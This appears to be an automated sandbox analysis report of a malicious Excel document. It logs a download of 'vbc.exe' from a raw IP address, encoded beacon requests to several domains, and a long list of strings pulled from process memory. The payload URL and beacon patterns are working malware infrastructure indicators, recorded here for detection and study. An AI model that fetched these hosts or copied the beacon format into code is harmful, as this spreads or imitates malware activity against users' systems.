Source: global traffic	HTTP traffic detected: GET /coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.snhdt.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=GKk2d32OHEJliZV7lc1R0hFu4AxFv3Wk4g8o+d/QQJC2fTrUsNVYmPem7KfYQyXD+5gDrQ== HTTP/1.1Host: www.kapkwata.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /coz3/?MPxhwJ=aFYZso2mvNEUZnS9j6THNTuqPDrOfInARvQYZFtdg9PpX/64PIjCzIwYqotU8KZChZyPAA==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.penrosecondos-official.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ== HTTP/1.1Host: www.teleeducationforafghanistan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /coz3/?MPxhwJ=r7KW2tdRwlRuK7ncHXLiovSXqLjDerMq8ItDnZvkA+2BRQOB5Pe97gh02v96lMs3N6IAbw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.thevirginiahomesource.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 34.102.136.180 34.102.136.180

Source: Joe Sandbox View	ASN Name: VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG
Source: Joe Sandbox View	ASN Name: RMH-14US RMH-14US
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic

HTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.188Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.212.188

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EAFAC90.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.188Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=jNDZ6p/mqvXz+lV8Z3ikV5w1yZNnar/gT18SrTzuUceB+Xpt3Ns987IJweZa7faZLQZG0w== HTTP/1.1Host: www.myecovet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.snhdt.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=GKk2d32OHEJliZV7lc1R0hFu4AxFv3Wk4g8o+d/QQJC2fTrUsNVYmPem7KfYQyXD+5gDrQ== HTTP/1.1Host: www.kapkwata.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /coz3/?MPxhwJ=aFYZso2mvNEUZnS9j6THNTuqPDrOfInARvQYZFtdg9PpX/64PIjCzIwYqotU8KZChZyPAA==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.penrosecondos-official.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ== HTTP/1.1Host: www.teleeducationforafghanistan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /coz3/?MPxhwJ=r7KW2tdRwlRuK7ncHXLiovSXqLjDerMq8ItDnZvkA+2BRQOB5Pe97gh02v96lMs3N6IAbw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.thevirginiahomesource.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.myecovet.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Nov 2020 20:23:47 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.penrosecondos-official.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2Connection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8

Source: explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000002.2350497797.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2139033957.000000000239E000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
